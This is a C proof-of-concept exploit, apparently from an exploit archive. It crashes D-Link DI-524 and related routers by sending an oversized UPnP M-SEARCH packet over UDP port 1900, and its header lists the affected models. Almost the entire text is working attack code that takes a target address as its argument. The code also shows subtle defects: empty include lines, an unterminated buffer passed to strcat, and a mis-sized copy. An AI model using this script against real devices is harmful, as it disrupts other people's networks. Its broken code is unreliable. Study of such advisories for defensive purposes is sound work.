/* routers affected from eEye's advisory. /str0ke Routers Affected: DI-524 Rev A DI-524 Rev C DI-524 Rev D DI-604 Rev E DI-624 Rev C DI-624 Rev D DI-784 Rev A EBR-2310 Rev A WBR-1310 Rev A WBR-2310 Rev A */ /* * D-Link Router UPNP DOS PoC * Written By: ub3rst4r aka DiGiTALST*R * Tested Against: DI-524 Rev. A * * A remote stack overflow exists in a range of wired and wireless D-Link * routers. This vulnerability allows an attacker to execute privileged code * on an affected device. Although a stack overflow does exist, debugging this * vulnerabilty requires additional external hardware. * * NOTE: You might need to try sending this twice, or use 239.255.255.250 * * Credits: eEye Digital Security * */ #include #include #pragma comment(lib,"ws2_32") int main(int argc, char **argv) { WSADATA wsa; char buf[896]; int sockfd; struct sockaddr_in serv_addr; int ret; if (argc < 2) { printf("Usage: dlinkdos \n"); return 0; } WSAStartup(MAKEWORD(1,1), &wsa); // the main string memcpy(buf, "M-SEARCH ", 9); memset(buf+9, 'A', 800); memcpy(buf+809, " HTTP/1.1\r\n", 10); // extra data strcat(buf, "Host:239.255.255.250:1900\r\n" "ST:upnp:rootdevice\r\n" "Man:\"ssdp:discover\"\r\n" "MX:3\r\n" "\r\n" "\r\n"); sockfd = socket(AF_INET, SOCK_DGRAM, 0); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(1900); serv_addr.sin_addr.s_addr = inet_addr(argv[1]); memset(&serv_addr.sin_zero, '\0', 8); ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr)); if (ret <= 0) { printf("failed to send request\n"); return 0; } printf("request sent!\n"); WSACleanup(); return 0; }